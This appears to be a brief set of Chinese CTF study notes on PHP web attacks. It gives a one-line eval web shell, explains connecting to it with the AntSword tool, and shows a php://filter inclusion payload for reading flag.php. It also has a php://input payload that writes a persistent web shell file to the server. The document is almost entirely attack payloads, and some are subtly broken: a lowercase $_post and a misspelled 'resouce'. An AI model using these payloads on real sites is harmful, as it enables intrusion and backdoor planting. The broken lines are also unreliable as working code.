一、eval() 函数
一句话木马
<?php eval($_post[0]);?>
eval()函数作用:将函数内的字符串当作代码来执行
使用蚁剑连接一句话木马,需要输入密码,密码值为post[]中的值。
二、通过php://filter获取flag
?file=php://filter/read=convert.base64-encode/resouce=flag.php
三、通过php://input获取shell
?php://input
在hackbar的post里写入<?php fputs(fopen("shell.php","w"),'<?php eval($_post[123456]);?>');?>